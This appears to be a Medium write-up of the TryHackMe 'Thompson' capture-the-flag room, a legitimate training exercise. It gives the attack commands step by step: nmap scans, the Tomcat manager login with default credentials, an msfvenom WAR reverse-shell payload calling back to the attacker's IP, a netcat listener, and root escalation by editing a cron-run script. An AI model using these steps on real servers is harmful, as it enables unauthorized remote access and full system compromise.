TryHackMe Thompson

Hello Everyone! Today we are going to solve the TryHackMe machine Thompson

Firstly, connect to the THM machine using VPN and start the machine

Start with Nmap scan to find out the open ports and services running on the machine

Note: If you are running as root, you don’t need to use sudo command

nmap -Pn 10.10.195.168

Perform the advance scan to find out the service versions running on the system

nmap -sC -sV -A 10.10.195.168

Let’s check the IP-address in the browser to find the details in webpage

Check all the pages so that we can find any information, if we open the manager app we can see it is asking for the password

Once we click on cancel we can see it is giving us the username as “tomcat”and password as “s3cret”

Now, try to login with the credentials

We successfully logged into the manager app and we can see lot of directories and information inside and we can see that we can upload a WAR file

Now we can upload a payload and get the reverse shell and it is only accepting the file format as war. Try googling the payload and see what we can find

We found a command to generate a payload to get the reverse shell

ifconfig tun0

The LHOST is our tun0 IP and LPORT we can give any random port

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war

Now upload the shell.war file in the website and before that make sure where it is uploading and confirm that it has uploaded successfully

We can see that it has uploaded under the /manger and we can see our shell has uploaded successfully. Now, start the netcat listener with given port and click on the shell file in the browser and we successfully got our connection

nc -nlvp 1234

Check the user and the current working directory

In the /home/jack folder we found our user flag and to escalate privileges and get the root shell we need to find a way

cat user.txt

Get an interactive shell using python so that we can understand everything

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now, we have seen another file id.sh and it has all the permission and check whether it runs all the time with the root privileges or not. Go to /etc/crontab

cat /etc/crontab

We can see it runs all the time and only in /home/jack directory it runs and using that we can copy the root flag from /root/root.txt directory and save it to a new file finalflag.txt

echo “cat /root/root.txt > finalflag.txt” > id.sh

Wait for a minute to run the cronjob and we can see our finalflag.txt file

ls

We finally got our root flag, there are other methods also get the flag but I just directly copied from the /root directory to get the flag

cat finalflag.txt

Finally we successfully completed the machine

This concludes the room and both flags have been captured!

Penetration Tester| WAPT | Bug Bounty Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Flutter Music And Video Player.

SPRING TRAINING IN CHENNAI

What are the Project Management Tools that are used for effective Project Planning?

Construction management with digitized workflow

Playmaker: The Reality of 10x Engineer

Notes from SpringOne Conference

Using Disposable Password on Bitbucket

Reading Club — Subjects

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Pavan Msvs

Pavan Msvs

Penetration Tester| WAPT | Bug Bounty Hunter

More from Medium

Axelar — like a breath of fresh air

SolClout Bridge Tutorial

“The” train

Colorizing Images and Videos using DeOldify